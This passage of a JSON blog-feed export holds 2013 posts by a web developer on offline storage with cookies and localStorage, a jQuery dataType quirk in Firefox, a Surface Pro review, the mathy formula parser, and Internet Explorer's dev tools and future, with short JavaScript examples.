want to be able to query the data. If you’ve got lots of objects you’ll have to get them all back out and do in-memory querying of the data.\nImplementing Cookie storage While it’s an exercise in reinventing the wheel we’ll have a look at how to create a very simple key/value storage API on top of cookies.\nWe’ll be using our FlightMode API and creating a new adapter which internally uses PPK’s cookie API.\nFirst things first, how are we storing our data across two types cookies, one is going to be a cookie to track the IDs of the items in the store and the other will be storing the individual items. The reasons for this is we want to avoid exceeding the limits of what we can store in each cookie and additionally we want to be easily able to look up values based on a key.\nWhen we create a new store we’ll check if there’s a tracker cookie, if not we’ll create one:\nvar CookieAdapter = function (storeName) { this.storeName = storeName; var cookie = readCookie(storeName); if (!cookie) { cookie = []; createCookie(storeName, JSON.stringify(cookie)); } else { cookie = JSON.parse(cookie); } this.cookie = cookie; }; Now before we create an add method we’ll need to be able to create IDs, we could do this a couple of ways, we could use the length of our tracking cookie or instead I’m going to use a GUID, here’s a simple function to generate one:\nfunction guid() { return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxx'.replace(/[xy]/g, function (c) { var r = Math.random() * 16 | 0; var v = c == 'x' ? r : (r & 0x3 | 0x8); return v.toString(16); }); } Ultimately all we will be storing is JSON representations of the objects that we push into our store, here’s how an add method would come together:\nCookieAdapter.prototype.add = function(obj) { var id = guid(); createCookie(id, JSON.stringify(obj)); this.cookie.push(id); createCookie(this.storeName, JSON.stringify(this.cookie)); return id; }; First off we’ll generate a new GUID, then insert the record as a new cookie using that ID as the cookie name. Finally we’ll update tracker with the new value.\nYou can find the rest of the implementation in the github repository.\nConclusionIn this part we’ve taken a look at the idea of using cookies as a storage model for when our application is offline. We’ve seen that they have the advantage of automatically being sent to our server as they are part of the HTTP header.\nWe’ve also seen that there’s some really big warning signs that say using cookies for more than just really simple state is a bad idea, they are all just stored as strings meaning that any manipulation has to be done in memory after deserializing all the data.\nIf you’re curious to see an implementation of cookies for storage in the wild you can check out Qantas, they use cookies to store information like your recent search options. There’s a usercontext cookie that contains the information about where you are that could be wanting to start a flight from.\nAll in all cookies are not really a good option when it comes to store data for our offline application.\n", "id": "2013-05-23-cookies" }, { "title": "Flight Mode - Introduction", "url": "https://www.aaron-powell.com/posts/2013-05-23-introduction/", "date": "Thu, 23 May 2013 00:00:00 +0000", "tags": [ "offline-storage", "flight-mode" ], "description": "", "content": "So you’ve got an idea to build an amazing new web application, it’s going to make you tens of dollars, hundreds of cents, it’s all web API’ed and SPA. There’s a responsive design so it’s mobile friendly, all the cool stuff. But there’s one last piece of the puzzle you need to sort out, offline data. Your application needs to be able to store data in a way that users and still interact with it, even if it’s at a basic level, when they are offline.\nYou need to handle Flight Mode.\nThroughout this series we’re going to be looking at how to do this, how to do offline data storage in your web application. For convenience the series is going to be broken down across the following posts:\nIntroduction Cookies localStorage and sessionStorage IndexedDB FileSystem APIs Useful libraries for offline storage I’m also going to be showing off basic implementations as we’re going along to give a bit of an insight into the way we can implement using these storage models.\nFor that I’ve created a little library which we’ll be interacting via, called FlightMode. This then allows you to create adapters which are implementations of an underlying storage layer, here’s our API that we’ll interacting with:\n(function (global) { 'use strict'; var FlightMode = function (storeName, adapterName) { if (!(this instanceof FlightMode)) { return new FlightMode(storeName); } this.storeName = storeName; var adapter = FlightMode.adapters[adapterName] || FlightMode.defaultAdapter; this.adapter = adapter.init(storeName); }; FlightMode.prototype.add = function(obj) { return this.adapter.add(obj); }; FlightMode.prototype.remove = function(id) { return this.adapter.remove(id); }; FlightMode.prototype.get = function(id) { return this.adapter.get(id); }; FlightMode.prototype.getAll = function() { return this.adapter.getAll(); }; FlightMode.prototype.getBy = function(property, value) { return this.adapter.getBy(property, value); }; FlightMode.prototype.destroy = function() { return this.adapter.destroy(); }; FlightMode.adapters = []; global.FlightMode = FlightMode; })(window); The code is also available on my github.\nSo sit back and let’s have a look at how to do Flight Mode capable web applications.\n", "id": "2013-05-23-introduction" }, { "title": "Flight Mode - local and session storage", "url": "https://www.aaron-powell.com/posts/2013-05-23-local-session-storage/", "date": "Thu, 23 May 2013 00:00:00 +0000", "tags": [ "flight-mode", "offline-storage", "localStorage", "sessionStorage" ], "description": "", "content": "Last time we looked a using cookies to store offline data and we also saw that there’s a number of problems with that approach. So let’s move forward, let’s look at what our next option would be when it comes to offline storage in our multi-dollar application.\nToday it’s time for the next level of offline storage, localStorage and sessionStorage which is sometimes referred to as DOM storage.\nI’m going to talk about both of these options together as they share a lot of similarities.\nThere’s a bit of a misconception around these two APIs, people often refer to them as HTML5 storage but in truth they have been available much longer than that, in fact they can be used in browsers as low as IE8 which is not much of a HTML5 browser, and there’s a lot more interesting storage options for “HTML5 browsers” that we’ll look at later.\nBenefits of local/session storage Like cookies localStorage and sessionStorage store key/value pairs of data, but they have a much nicer API to work with than you find when trying to work with cookies; it has explicit methods for getting, setting and removing data.\nI keep referring to these two storage models together as they share a common root API but they are different. sessionStorage is designed for storing data for the life of a browser session (until the window/tab is closed). This can make it ideal if you’ve got data that you want to temporarily store until the user leaves your application. But this obviously makes it a dangerous one to use in our scenario, because if the browser was to crash while the user is offline you’re likely to loose the data.\nlocalStorage on the other hand is a long-term persistent storage, meaning that the data will stay between browser restarts, making it much more ideal for persisting data when we’re offline.\nBut ultimately you need to select the right one for the right scenario so there are valid use cases for both and it’s good to have that option.\nDrawbacks of local/session storage Like cookies these stores are only capable of storing string values. This has the obvious drawback of being difficult to use if we’ve got a complex object that we’re going to want to store for our application state.\nThe other main drawback is that there’s no “magic sync to server” like with cookies. The data stored in either of these stores is only available to the client application, if you need to get the data back up to the server then you’ll need to perform your own data sync. Now that does have the benefit of not having extra data added to a HTTP request so it’s both a pro and a con.\nImplementing local/session storage While it’s an exercise in reinventing the wheel we’ll have a look at how to create a very simple key/value storage API on top of both localStorage and sessionStorage.\nWe’ll be using our FlightMode API and creating two new adapters, one for each of the stores.\nAs I mentioned they have a nice API to work with and we get data in/out like so:\nlocalStorage.setItem('foo', 'bar'); var item = localStorage.getItem('foo'); localStorage.removeItem('foo'); But like cookies it can only store string values meaning that we’ll be doing a lot of JSON serialization/deserialization, for example here’s how we would do a get/getAll method:\nStore.prototype.get = function(id) { return JSON.parse(this.storage.getItem(id)); }; Store.prototype.getAll = function() { return this.store.map(this.get.bind(this)); }; And like the cookie implementation we’re tracking the IDs of all known objects which also adds overhead to out interactions as we need to add/remove items from the tracking object.\nYou can find the rest of the implementation in the github repository.\nConclusionWhile it might seem that there’s quite a number of downsides for localStorage and sessionStorage over cookies when looking at offline storage options. But really localStorage and sessionStorage are much better options as they:\nDon’t pollute the HTTP headers and thus increases the request/response size It’s designed for storing medium-sized bits of data Getting items in/out has a cleaner API, and it’s better designed than relying on string splitting So if you’re needing to store only really simple data structures across browser sessions then localStorage is a good option especially if the data you’re working with can be indexed by a single property (which would represent your key). If you’re only really focused on single-session cache then sessionStorage can be a good option but it has a much narrower use-case and is less than ideal for offline applications.\nIf you’re curious to see an implementation of using localStorage for storing data then check out twitter.com and use your browsers dev tools to inspect localStorage. If you start writing a tweet and then close the tab the contents of that tweet are stored in an item keyed __draft_tweets__:home (there’s also a __draft_tweets__:profile for doing it on your profile page). And there’s a bunch of other useful data stored in there. While this data isn’t synced across instances it’s good for when you use a browser and then come back later.\n", "id": "2013-05-23-local-session-storage" }, { "title": "Firefox, jQuery and the case of the Document response", "url": "https://www.aaron-powell.com/posts/2013-05-07-firefox-jquery-missing-datatype/", "date": "Tue, 07 May 2013 00:00:00 +0000", "tags": [ "jquery" ], "description": "A mystery that resulted in a strange mix of expected responses", "content": "I recently tweeted that I was having this problem:\nAs you can see something’s not right there, Chrome is not getting anything back from my AJAX request (or at least a falsey value) where as Firefox seems to be having a Document object.\nI was stumped.\nWhy are you seeing two different responses from the exact same bit of code?\nSo the response we’re getting back has a 0 content length and that was my first point of call, something must be causing the browsers to behave differently when you’ve not got any content.\nI ended up here and what I found was that when this is called:\ncomplete( status, statusText, responses, responseHeaders ); The response object has different properties depending on the browser, in Chrome (and IE) it has a single text property but in Firefox it has a text and xml property. I think we’ve found our problem boss, we’ve somehow got different objects. But still, why are we ending up with a document object not the text like Chrome?\nWell next we end up through this logic. Here jQuery works out what dataType you’re response is and it gives you the appropriate data.\nNow the astute reader may have noticed I wasn’t setting a dataType in my request which means that jQuery will have to do it’s best guess at what to give me, and that is done through this:\n// Try convertible dataTypes for ( type in responses ) { if ( !dataTypes[ 0 ] || s.converters[ type + " " + dataTypes[0] ] ) { finalDataType = type; break; } if ( !firstDataType ) { firstDataType = type; } } It uses a for in loop of all the properties of the response and settles on the last one if it can’t find anything else. Guess what the last one is… xml!\nWell that makes for an easy solution, once you set a dataType on your jQuery ajax settings you’re all good to go, which leads me to my conclusion:\nIf null is valid from your response make sure you tell jQuery what dataType you want it to be. There’s an example repository available here.\n", "id": "2013-05-07-firefox-jquery-missing-datatype" }, { "title": "Internet Explorer userAgents", "url": "https://www.aaron-powell.com/posts/2013-04-19-ie-useragents/", "date": "Fri, 19 Apr 2013 00:00:00 +0000", "tags": [ "internet-explorer", "web" ], "description": "A new program from the IE team", "content": "A few months ago I was asked if I wanted to join a new program that the Internet Explorer team was starting up called IE userAgents. No isn’t related to the the Internet Explorer userAgent string, or the fact that in the leaked IE11 builds it has had a makeover, instead it’s about evangelism of the web platform and shifting peoples perceptions of IE as a modern browser. It’s also worth noting that Internet Explorer isn’t the only browser that has a program like this, Mozilla does too and I’d expect the other browsers do to.\nSo what do we do? Well ultimately it doesn’t really change anything in my day-to-day live as a web developer, I use IE to varying degrees most days, and since getting a Surface Pro I pretty much exclusively use it. What we (we being the userAgents) tend to do is keep an eye on keywords across the various social media touch points like Twitter. If someone’s complaining about a site not working in IE then we will look to reach out to them and help them resolve their problem. A similar thing goes with StackOverflow, you’ll find a number of the userAgents hanging around on there answering the communities questions. More often than not the problems people have with Internet Explorer often come down to misconceptions about how to approach web development, things like using userAgent sniffing instead of feature detection or not realizing the browsers capabilities. These issues can present in all browsers, not just Internet Explorer, and educating people on developing for modern browsers (in particular avoiding userAgent sniffing) will ultimately benefit everyone.\nThere is another side though, and that’s addressing specific Internet Explorer problems. Fellow userAgent Johnathan Sampson has been documenting IE10 specific problems as well as work around for those with the aim to be able to produce a guide on things to watch out for and how best to work around them.\nOver the coming months you’ll probably see us out and about in the community, helping to ensure that web developers are as well informed as they can be when producing applications for the modern web. If you want to get in touch with us you can:\nFind us on the twitter list Ping the @IEDevChat twitter account Use the #IEuserAgents hash tag One final note, please stop sniffing userAgents, I promise that I had a shower this morning ;).\n", "id": "2013-04-19-ie-useragents" }, { "title": "IndexedDB at Web Directions Code 13", "url": "https://www.aaron-powell.com/posts/2013-04-10-wdc13/", "date": "Wed, 10 Apr 2013 00:00:00 +0000", "tags": [ "speaking", "indexeddb" ], "description": "Upcoming speaking on IndexedDB", "content": "I’m going to be speaking at the upcoming Web Directions Code in Melbourne (2nd & 3rd May) on the topic of IndexedDB. I’m pretty stoked to be invited to speak as there’s a lot of heavy weights of the web development community that are going to be around and I’ll finally have a chance to crack out my IndexedDB talk to a larger audience.\nSo do yourself a favor, grab a ticket and come on down!\n", "id": "2013-04-10-wdc13" }, { "title": "KnockoutJS plugin for Glimpse", "url": "https://www.aaron-powell.com/posts/2013-03-25-knockoutjs/", "date": "Mon, 25 Mar 2013 00:00:00 +0000", "tags": [ "knockoutjs", "glimpse" ], "description": "A new release of a KnockoutJS plugin for Glimpse", "content": "When I was recently in Seattle for MVP Summit I was hanging out with Anthony van der Hoorn and Nik Molnar of the Glimpse fame. Anthony, knowing my passion for JavaScript has been bouncing ideas around the client-side code for Glimpse for a while and wanting me to have a crack at building a client-side plugin for them. Well it seemed like the perfect time to get to it and not just because I had both the guys on hand to bug when things went wrong ;).\nHaving decided to write a plugin I next had to work out what the plugin would be for and I settled on KnockoutJS. While I’ll admit that I’ve had a love-hate relationship with Knockout the problem space it’s in is very real and it does solve it very well, but when you have Knockout on a page it can be very difficult to work out where you’re actually using it and what’s actually happening in it.\nTo that end I’ve started a Glimpse KnockoutJS plugin. It’s still in its early days (and I’d love feedback hint hint) but so far what it aims to do is:\nShow you what ViewModels are on a page and what DOM element(s) they are bound to The idea here is that you can see if a ViewModel is reused across multiple DOM elements Capture new ViewModels being added to the page and show them in the plugin This can be handy if you’re creating ViewModels in popups or from Ajax requests Show you the properties of the ViewModels, and if they are observable properties track their changes This should work for any kind of observable, be it a simple observable, an observable array or a computed observable Like I said this is a very early release, but it’s more I wanted it out there and to get feedback ASAP to work out what to focus on. I’ve only done some basic testing so if you’re using it on large Knockout VM’s I’d like to hear how it goes.\nThe code is all up on GitHub so feel free to send PR’s or raise issues so I can get to work on it!\n", "id": "2013-03-25-knockoutjs" }, { "title": "A week with a Surface Pro", "url": "https://www.aaron-powell.com/posts/2013-03-10-a-week-with-a-surface-pro/", "date": "Sun, 10 Mar 2013 00:00:00 +0000", "tags": [ "random" ], "description": "Obligatory post about my experiences to date with a Surface Pro", "content": "So a little a week ago I got myself a Surface Pro and I decided that I’d share my experience with it thus far (because that’s what you do with a new device right? :P).\nFor the record my current Windows machine is a Sony Vaio Z which is about 2.5 years old and I have an iPad 2, so these were the two devices that my Surface Pro was looking to replace.\nThe screenFirst off let’s talk about the screen, it’s the first thing you’ll see after all, and I must say it’s a very nice screen to work with indeed. The Surface Pro is a 1920 x 1080 resolution on a 10.6" panel so it’s a pretty high pixel density packed in there. Sure it’s no retina display but it’s pretty well up there.\nWhen in Metro-mode things fit nicely, IE looks really good on it and the few apps that I have installed/used (mail, calendar, twitter, facebook, etc) do fit in with the design theme nicely. Most importantly they look sharp under the display.\nDesktop-mode is a little different. By default the Surface Pro has the font size turned up to 150% meaning that many windows look just plain odd, toolbars don’t fit in properly, consoles look weird, etc. One of the first tasks I undertook on Desktop was to flick it down to 125%. This seems to make everything scale to a much better size while still keeping things large enough to be touch friendly.\nThe only big worry people have with a touch-enabled screen is fingerprints. Currently I’m looking at the screen while typing the post out and I can honestly say I don’t notice any. When the screen is off and I’m in direct sunlight I’ll notice them but in that regard I’m not really using my screen anyway.\nInteracting with itWhen I bought the Surface Pro I wanted to get a keyboard. Having had an iPad for 18 months now one thing that annoys me about it is that I don’t have a keyboard with it. Sure I could grab my Bluetooth keyboard or get one of the many cases that have one built in but really they don’t seem to fit the ascetics of the device.\nSo you’ve got two choices for the Surface series, a Touch Cover or a Type Cover. I strongly recommend that before you choose one you do some typing with both and see what you feel most comfortable with. When I was getting the device I went to test both keyboards by firing up Word and having a type around. To me the Type Cover just felt a lot nicer to work with, the Touch Cover lacked the tactile sensation that many years on a computer have trained me to want and I found that the low-profile that the keyboard runs meant I missed keys too often as I didn’t judge the spacing.\nThe Type Cover reminds me of my Vaio keyboard, it’s got a good tactile response, a good key size and most importantly a good sound as you press the keys!\nWhat I have found about the keyboard is that it can miss keys; I’m not sure if this is something with my device or not but every now and then I seem to have it miss a few keystrokes that I make, meaning you have to go back over what you’re doing. I’d expect this is some driver-level issue that hopefully will clear up as the device matures but since it’s hard to reproduce I can imagine it’ll be a slow fix.\nOne of the main reasons I wanted a Pro over a RT was the pen support. The Pro comes with a pen and I must say it’s really fantastic to use. So far I haven’t been in enough meetings that I’ve actually had to crack it out but I’ve done some doodling in various apps and it just works as you’d expect it to work. I’ll often find myself using the pen in Desktop mode instead of the trackpad or my finger because of its precision.\nAnd that leads me onto the trackpad in the cover, or more generally, mouse based input. I can probably count the number of times on one hand that I’ve used the trackpad that comes in the cover, simply put I find it redundant (for the record I primarily use the trackpad on my laptop over an external mouse so it’s not an anti-trackpad stance or anything). With the screen as close as it is it’s very easy, and natural, to just reach out and touch it to move around. Even writing this I’ve been touching around the screen to move the cursor back/forth because it’s quicker than the trackpad or arrow keys.\nI’ve been really surprised at how quickly I’ve adapted to having a touch-enabled device in front of me and how quickly I got use to being about to touch the screen to perform my actions. This has gotten to the point where I now expect all my screens to be touch enabled which has made me feel rather silly when I’ve poked the screens on my work machine or when I spent a good 30 seconds poking my Vaio screen and getting angry that the window wasn’t exiting.\nDesktop mode is really the only place that is let down by touch, particularly Visual Studio.\nCodingSince I’m a coder it was natural that Visual Studio was going to wind up on here at some point. So far I haven’t done anything really intensive in the form of development using the Surface Pro, more just opening projects and browsing around the source. But Visual Studio really isn’t designed for touch. I’d like to be able to “flick up” and have the source code scroll but alas it’s not to be, instead I find myself fighting with the small scrollbars and often reverting to the pen as it’s much better a finer point interaction.\nAs I said I haven’t done much in the way of coding on the device so I can’t really comment on the overall performance of it, but I think it’s safe to say that I don’t see this as a replacement for a high-end developer laptop, instead I see this as something I can grab out on the train for a quick bit of coding, especially if I’m focusing on something non-Visual Studio based.\nMetro or DesktopI’ve been trying to keep my usage of this device very much in the Metro word, I have my mail setup using the Mail app, calendars are available through Calendar, etc. Generally speaking this is working well for me.\nMail is a bit up-and-down with it’s interactions. I’ve come from an Outlook background and as someone who tries to maintain a “zero inbox” but ultimately found this was something that fell by the wayside with the Mail client. Part of the reason was it is a bit of a hassle to move mail around into folders and part of it is because it seems less valuable to do so, since the entire mailbox isn’t down it’s easier to have one folder to search rather than rummaging around (but this is more of a general mail organization shift than specific to Windows 8 Mail).\nThat said I do have Outlook installed as well and generally speaking I have both running. I like Outlook for its familiar but the UI isn’t really touch optimized so it can be a bit clunky. Mail is nicer for touch but the integration with the GAL is really terrible and I can’t for the life of me work out how to add someone as a contact, even if they emailed me first (again where Outlook is much more useful).\nIE works fantastically in Metro, the new shell is really slick and the interactions are really nicely designed. So far I haven’t even installed another browser, I’ve found no need (maybe once I start doing some more web dev I’ll switch since I’ve got some opinions on the dev tools). The only real frustrating thing is there’s no plugin support so I can’t get my password manager integrated which makes the workflow of hitting somewhere I need to log into a pain.\nFor twitter I’ve been trying a variety of clients. Currently I’m using MetroTwit for Win8, I tried Rowi but I really didn’t like it (no replies in snapped, full screen has a really strange use of space and a few other issues).\nI’ve been trying out a few different RSS readers, found a paid one called Feed Reader that has a trial version that seems pretty good.\nSo mostly I find myself in Metro mode as there’s been very little that I need in common usage to go to desktop. That said if it wasn’t for Snapped mode then it might be a different story. I’ve pretty much always got twitter snapped, ticking away. The screen resolution is more than enough to visible space to have a good browser window/email window/etc and having twitter running there too.\nOverallI’ve been using Win8 on my laptop for over 12 months now and had always enjoyed it but now having a touch-enabled device to use it on I’ve really seen it in a whole new light. The Metro UI makes a lot more sense in a touch environment, the platform integration (sharing, search, etc) is so smooth.\nThe Surface Pro is great device, if you’re looking for something reasonably portable I’d recommend looking at it. It’s a little bit on the heavy side for me to consider it a direct iPad replacement, but compared to even my Vaio Z (which is really light) it’s a much more portable device.\nOne thing’s for sure, my next developer laptop is going to be touch-enabled, I’m finding it surprisingly advantageous.\n", "id": "2013-03-10-a-week-with-a-surface-pro" }, { "title": "Hello mathy", "url": "https://www.aaron-powell.com/posts/2013-01-22-hello-mathy/", "date": "Tue, 22 Jan 2013 00:00:00 +0000", "tags": [ "typescript", "javascript", "web" ], "description": "An introduction to another new library from me, this time it's mathy, a simple formula parser", "content": "In a previous post I laid out some thoughts on TypeScript which came from building a little library in TypeScript called mathy.\nHello mathyA few months ago I came to a realisation… I’ve never written a parser, at least not a language parser. Sure I’ve parsed CSVs, sure I’ve parsed XML, but never a language.\nPart of what I’ve been working on recently has needed a formula parser to deal with chemical formulas, basically we need to be able to take this:\nY = (Q * 0.12 + 100) / (Q * 15) Another member of the team wrote a C# parser for this so I decided in my spare time to implement something similar in JavaScript and hence mathy was born.\nThe usage is something like this:\nvar engine = new mathy.Engine({ name: 'a', derivation: '1 + 2' }); var result = engine.process(); expect(result[0]).to.equal(3); Pretty simple, create a new engine, provide it some parameters and process it. You can also install mathy as a global Node.js module and get a new command that will do math for you:\n>> npm install -g mathy >> mathy "1 + 2" //output's 3 Smarter than your average shellSo that example isn’t particularly useful, open up PowerShell (or Terminal) and you can easily just type 1 + 2 and get a result. Where mathy does get a bit more useful is when you want a more complex formula parsed, something like this:\nvar engine = new mathy.Engine({ name: 'a', derivation: '1 + 2 * 3 - 1 * 10 ^ 1 / 5' }); var result = engine.process(); expect(result[0]).to.equal(5); Here we’re doing a to the power of (using ^), you can also do negative powers like this:\nvar engine = new mathy.Engine({ name: 'a', derivation: '1 + 2 * 3 - 1 * 10 ^ (-1) / 5' }); Yes negative powers need to be parenthesis wrapped, that’s pretty standard notation if you look around at how to handle it.\nSmarter calculationsLet’s think back to the example that I said we’re parsing in our application:\nY = (Q * 0.12 + 100) / (Q * 15) Well Q isn’t exactly a number so that isn’t a mathematical equation yet, but that’s cool, mathy will allow you to provide multiple parameters, like so:\nvar engine = new mathy.Engine( { name: 'a', derivation: '(Q * 0.12 + 100) / (Q * 15)', result: true }, { name: 'Q', derivation: '10' } ); Now when mathy runs it’ll hit the Q in the formula and then attempt to resolve that. It’ll realise that it’s not a numerical value so it’ll then see if it was another parameter, then it’ll find the value of 10 and be able to insert that.\nWhere this is more useful is when you want to late-add a parameter, meaning you can do this:\nvar engine = new mathy.Engine( { name: 'a', derivation: '(Q * 0.12 + 100) / (Q * 15)', result: true } ); engine.add({ name: 'Q', derivation: '10' }); So you can create the engine and then ask the user for the inputs, adding them as they are provided.\nDecisions, decisionsWhile it’s all well and good to be able to process parameterised numerical equations where mathy starts to get into its own is where it diverges and becomes a bit more of a standalone language; the main feature for this is decisions.\nA decision is a binary condition statement, a tuple, and it’s used like so:\nvar engine = new mathy.Engine( { name: 'a', derivation: '1 > 2 ? -1 : 42' } ); The statement on the left will be evaluated as a true/false statement (it only supports JavaScript strict-equal equality, but you only need to use == not ===).\nAnd of course all parts (well, except the operator) can be parameters:\nnew mathy.Engine( { name: 'a', derivation: 'b == c ? d : e', result: true }, { name: 'b', derivation: '42' }, { name: 'c', derivation: 'd' }, { name: 'd', derivation: '42' }, { name: 'e', derivation: '-1' } ); Real-world usageIt’s all well and good to make this simple little language/parser for chemical formulas but is there any other real reason you’d do this?\nMy main thoughts on this would be in a shopping cart scenario. Since you shouldn’t trust the client if you’re doing any kind of calculation of the cart you’ll be wanting to do that server side. But what if you want to have some benefits? Say you have a threshold before they get free shipping, or a discount for certain number of purchases, preferred customer, etc.\nOften times these can be expressed as a simple formula rather a series of statements in code. Values like ‘is this customer a preferred customer’ can be provided as a parameter value to the formula which then does the calculation.\nConclusionSo there we have it, a very simple little JavaScript formula engine called mathy which has some nice little features to do slightly smarter formulas.\nCheck out the tests folder for more complex usage examples.\n", "id": "2013-01-22-hello-mathy" }, { "title": "Should Internet Explorer be killed?", "url": "https://www.aaron-powell.com/posts/2013-01-17-should-internet-explorer-be-killed/", "date": "Thu, 17 Jan 2013 00:00:00 +0000", "tags": [ "internet-explorer", "opinionated" ], "description": "Is it time for the IE brand to end-of-life?", "content": "Warning - OpinionsIn my last post I explored some of the issues I have with the IE developer tools that basically prevents me from using IE as a primary browser for web development.\nWhile writing that post it got me thinking about how I would go about solving those problems if I was in charge of the project.\nAnd yes, I am an IE MVP but from my perspective an important role of an MVP is to ask the hard questions and not just be another Yes Man, how do I think the IE team will react to this post? Well if I stop blogging and tweeting send help :P.\nDefining IE First off I want to define what I mean when I’m talking about Internet Explorer is the browser “shell” that you see. It’s what you get when you click the blue E. What it is not is Trident or Chakra, which are the rendering engine and JavaScript engine respectively. While these are core components that make up IE they are not where I think the problem lies.\nServing two masters So the main problem I see with IE is that it is trying to serve two masters, you have the personal computing user who uses IE. This is your parents, your grandparents, your next door neighbor, the person with a Surface RT. Generally speaking these are the people who are surfing the internet for personal reasons. These people don’t care about legacy stuff, they don’t care that your internal time scheduling application only works in IE6 running quirks mode. They just know that they are wanting to go to a page and it works.\nAnd then you have enterprise. Like it or not IE in the enterprise is really popular for a few reasons. There’s the obvious “it never got updated” reason which is why IE6 inside of big companies is still popular. But more than that IE from a sys admin point of view can be really stripped down. You can change some crazy things in the registry to restrict users (like disabling the developer tools). A lot of sys admins like this as it helps create a controlled environment, a “more secure” environment cough cough.\nThe web developer Then there’s the web developer. They are people like you and me who want to build applications that make use of the latest technologies, web sockets, webgl, offline, CSS3 animations, etc. We don’t give a damn about legacy browsers, that’s not be our target market, we just want browsers to be pushing forward and implementing these emerging standards rather than waiting until they are approved by W3C which can take a very long time.\nIE est mort, vive IE! Now to the crux of this post, the death of Internet Explorer. As I see it you have two real audiences of IE, the people who want it to just work and the people who want it controlled. These are two very distinct groups and the latter impacts the former.\nThe biggest problem that IE faces when trying to go to a faster release cycle is stability. What a lot of people don’t realise about IE is just how embedded in the OS the parts (Trident in particular) are. Trident, or MSHTML.dll, is really heavily used within Windows itself to do different things. Take the help system, it actually runs a web control which displays the content. This web control is powered by Trident. It’s also why you can’t have multiple IE versions installed at the same time, the assemblies would clash.\nAnd then you have Windows 8 which we see an even greater level of embedding of Trident and Chakra than before so they can power the HTML/JavaScript Windows 8 applications. While this isn’t running IE it’s running the same MSHTML.dll and other components.\nSo adopting a Chrome “release every other day” model would be a really risky venture, you need to be making sure that the releases don’t suddenly break anything (remember SharedView? It stopped working when you installed IE9…).\nAt the same time tying IE feature releases to major versions in the way it’s been done recently it equally risky. Sure IE has improved its release schedule over the past few years, but there was still ~18 months between RTM of IE9 and RTM of IE10 (and that was only IE10 for Windows 8, Windows 7 is still in preview). Even though there are preview releases in this time, calling something a preview actively discourages its use day-to-day (and often the preview release was lacking important features). Also think about how the web changed over that time period, WebSQL was the offline storage proposed. It was then scrapped for IndexedDB (which itself changed in spec several times causing breaks, imagine if an RTM had been released not a preview then). CSS animations went through a good amount of change with what arguments could get passed to the different transforms. This like this can be hard to react with a slow release cycle.\nThen there’s the backwards compatibility story. I think it’s quite amusing that there’s ways you can force IE to run as a specific version or that removing conditional comments had people really upset. Radical changes just aren’t possible in a brand with as much history as IE has.\nAnd finally, while they say that any press is good press IE has copped a lot of negative press in recent years. Even Microsoft is actively trying to embrace the hate they receive, most notably through this video. But all of this is too late in my opinion, the damage is done.\nAnd this is why I think IE can’t survive.\nFrom the ashes As I’ve said I think Trident and Chakra are great engines, and from this we could get a new direction. Essentially what I want to see is a fork of the IE project, an entirely new browser using the same underlying rendering and JavaScript engine, it’s just in a new outfit. Let’s call this mythical browser John (bah, naming things is hard and we can’t go with Bob again can we…).\nSo you go and install John, it installs into Program Files just like any other stand-alone piece of software and has everything it needs kept in there. John has a new UI shell so we can start revisiting things which really need an overhaul, but most importantly John can be updated without it impacting the core components of Windows which rely on HTML/JavaScript engines, particularly on Windows 8. John is a new take on how you would build a browser using the lessons learn in the last 12 years so it can be more agile and it can have new experimental features added behind flags.\nSo that’s it, no more IE? Completely end of life-ing a product that has such a long rich heritage that IE has is not exactly a realistic proposal. Instead I think that IE would live on in the manner which it is currently doing. IE maintains its current release cycle, 12 - 18 months between “major versions” which sees the addition of new features and the removal of old ones. But instead of being the driver of Microsoft’s web platform it becomes a consumer, a consumer of features introduced into John that are then accepted as stable, are tested for impacts to the whole Windows ecosystem, have registry settings to disable them, and so forth.\nThis means people are able to keep with a brand they have known for over a decade, it’s predictable to them and it just works but at the same time Microsoft is freed from the limitations of having a 12+ year legacy behind them with the pros and cons that brings to the table.\nThe fractured web Chances are you’re reading this and thinking “doesn’t this just fracture the browser market even more?”. The answer is “to a point yes”, but realistically it’s not that much different to the fracturing that we already have. The two main browser vendors besides Microsoft both have “bleeding edge” versions, Firefox has Aurora and Chrome has Canary and essentially what I’m proposing is a Microsoft version of that, just under a new brand name.\nAs we’re losing OldIE from the supported stack of our browsers we’re finding the idea of a fractured web to be less and less relevant. When targeting IE10, Firefox stable and Chrome stable it’s not particularly hard to get things looking the same and working the same. The only times it really become noticeable is when you’re doing some really whacky edge-case stuff and this is something that is only solvable by getting to a single browser, and that didn’t work out so well last time.\nIt’s not a perfect solution, but it does lessen the attitude of “modern browsers… and IE” that I commonly hear at user groups (despite IE10 trumping other browsers in some areas).\nConclusionI think the role of IE on the Windows platform needs to change. IE needs to be released from the shackles of Windows integration in the way it has been.\nUnfortunately I can’t see this happening while still maintaining an IE branding. The only alternative is the John approach, an entirely new browser, using the same stack, that can act as a conduit to IE and taking on the other browsers in the fast-evolving web that is today.\n", "id": "2013-01-17-should-internet-explorer-be-killed" }, { "title": "Making the Internet Explorer JavaScript tools better, again", "url": "https://www.aaron-powell.com/posts/2013-01-14-ie10-console-thoughts/", "date": "Mon, 14 Jan 2013 00:00:00 +0000", "tags": [ "javascript", "web", "internet-explorer", "web-dev" ], "description": "A look at what's changed since I last pointed out the failings of the IE dev tools", "content": "Almost two years ago I wrote a blog post about what I saw as problems in the IE9 developer tools.\nSince then we’ve had IE10 released as well so I decided to revisit the post and see how have the development tools changed/improved since IE9.\nconsole.log still sucks I made a point that when it comes to using console.log (and the derivatives) you often found that you got [object Object]. Well this is still the case, and most commonly you’ll see it if you’re using the console as a scratch pad to test things out. There are two solutions to this, one is to override the console.log method in a similar was as I mentioned with “fixing” console.assert or alternatively override the toString method of your object, since the reason you get [object Object] is because all it uses the toString method of the object (I override it to just do JSON.stringify(this)) You still can’t clear the console without right-clicking or using console.clear(), there’s a toolbar option that looks like it would do it but nope, that’s a cache clear button Related to the above point I really wish the Ctrl + R and/or F5 would work when input is focused on the dev tools, and by work I mean reload the page. Yes I get why they don’t work, the dev tools are running in a separate process, that’d be a nice thing to fix too… The list of provided User Agents is really good (as I said before) and the ability to save your own custom User Agents is nice Why is the DOM explorer still a static node list? C’mon this is 2013 guys and you make me refresh the DOM explorer when ever the DOM changes so I can inspect the current page state? Yes again I’m sure this is related to the fact that it’s a separate process but it’s just painful, especially if you’re working on a KnockoutJS UI or a SPA I would love an IndexedDB inspector like Chrome has in their dev tools, and since it’s build on ESE I would think that this shouldn’t be that big a deal, ESE is pretty well documented So…It looks like the IE dev tools saw very little love in the form of features with the IE10 release. I’ll admit that I didn’t really talk about the network/profile tab as I find these are not the features that you use 